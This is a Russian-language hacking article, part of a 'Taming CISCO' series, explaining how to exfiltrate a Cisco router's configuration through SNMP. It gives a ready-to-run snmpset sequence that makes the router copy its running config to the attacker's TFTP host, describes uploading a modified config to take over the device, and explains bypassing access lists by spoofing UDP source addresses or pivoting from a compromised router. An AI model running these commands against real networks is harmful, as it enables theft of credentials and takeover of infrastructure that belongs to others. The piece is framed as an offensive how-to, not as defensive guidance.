Укрощение CISCO – как слить конфигурацию роутера через SNMP (ч. 4)

В предыдущих статьях Укрощение CISCO – брутим ключ к TACACS+ и Укрощение CISCO – брутим ключ к TACACS+ (часть 2) и Укрощение CISCO – как взломать роутер на растоянии. (ч. 3) Мы уже касались темы взлома CISCO сетевых устройств. Сегодня мы вам раскажем как через уязвимости SNMP протокола, получить конфигурацию CISCO роутера.

Хотелось бы отдельным пунктом выделить атаки на циски через SNMP. Хотя на большинстве устройств SNMP изначально отключен, но он достаточно часто включается для удаленного мониторинга и управления девайсами (к тому же на некоторых включен с общеизвестными комьюнити-стрингами).

С точки зрения самой атаки все вполне стандартно: бери любимую тулзу да бруть, если SNMP-сервис доступен. Важно здесь другое — что в случае успеха и «подбора» комьюнити с правами на запись мы можем получить полный контроль над устройством. Ведь мы можем и  скачать конфигурацию, и залить новую через SNMP. Вот последовательность команд:

snmpset -c private -v 2c cisco_ip 1.3.6.1.4.1.9.9.96.1.1.1.1.2.444 i 1
snmpset -c private -v 2c cisco_ip 1.3.6.1.4.1.9.9.96.1.1.1.1.3.444 i 4
snmpset -c private -v 2c cisco_ip 1.3.6.1.4.1.9.9.96.1.1.1.1.4.444 i 1
snmpset -c private -v 2c cisco_ip 1.3.6.1.4.1.9.9.96.1.1.1.1.5.444 a 192.168.1.2
snmpset -c private -v 2c cisco_ip 1.3.6.1.4.1.9.9.96.1.1.1.1.6.444 s confi g
snmpset -c private -v 2c cisco_ip 1.3.6.1.4.1.9.9.96.1.1.1.1.14.444 i 1

Несмотря на длину, она вполне проста:
• -c private — комьюнити-строка на запись;
• -v 2c — версия протокола SNMP (чаще всего именно эта);
• cisco_ip — IP-адрес циски;
• 1.3.6.1.4.1.9.9.96.1.1.1.1.2.444 — специальный цисковский OID с 444 — случайным числом;
• i — тип устанавливаемых данных (i — integer, a — IP-адрес, s — строка).

Фактически данная последовательность указывает циске, что и куда скопировать. Первая команда определяет протокол TFTP (1 — TFTP, 2 — FTP, 3 — RCP, 4 — SCP, 5 — SFTP). Вторая — что копируем запущенную конфигурацию (1 — файл в сети, 2 — файл с флеша циски, 3 — startup-конфиг, 4 — running- конфиг, 5 — терминал, 6 — фабричный startup-конфиг). Третий — что копируем на удаленный ресурс, то есть файл в сети. Здесь выборка аналогична предыдущей команде. Далее указываем и IP-адрес нашего хоста, где открыт TFTP-порт. Пятой командой задаем, под каким конфигурация будет сохранена у нас. И последней мы запускаем копирование, делая созданную предыдущими командами запись активной (1 — active, 2 — notInService, 3 — notReady, 4 — createAndGo, 5 — createAndWait, 6 — destroy).

Таким образом, представленная последовательность будет аналогом команды в IOS:

copy running-confi g tftp://192.168.1.2/confi g

Но это мы получили конфигурацию. Для того чтобы ее залить обратно, требуется практически та же последовательность, только команды 2 и 3 поменяются местами. Таким образом, мы можем модифицировать конфигурацию и «подстроить» ее под наши нужды.

Одну из типовых трудностей, возникающих на нашем пути, представляют access-листы — они могут достаточно четко ограничивать перечень хостов, с которых разрешен доступ на  SNMP-сервис циски.

Но в этом случае нам могут помочь как минимум два метода. Во-первых, важно помнить, что SNMP — это UDP-протокол, в котором отсутствует handshake, то есть мы можем подменить  IP-адрес отправителя на разрешенный access-листом, таким образом обходя ограничение. Второе решение — атаковать циску с другой циски. Например, есть специальный management-сегмент, недоступный обычным юзерам, через который доступен SNMP на цисках. Тогда в случае, если мы взломаем одну циску, мы с нее можем отправить SNMP-команды на другие циски (так как у нее есть доступ в management-сегмент), чтобы те слили нам конфиг. Формат команд внутри цисок таков:

snmp set v2c 192.168.1.2 private oid 1.3.6.1.4.1.9.9.96.1.1.1..1.2.444 integer 1

Если же вернуться к первой части, то для того, чтобы не копировать «вручную», можно воспользоваться тулзами. Вариант первый — cisc0wn (goo.gl/wSvCY4), второй — snmpblow (входит в Kali Linux). Snmpblow умеет подделывать IP-адреса, зато первая более  «автоматическая» и может сразу отпарсить конфиг на интересные штуки.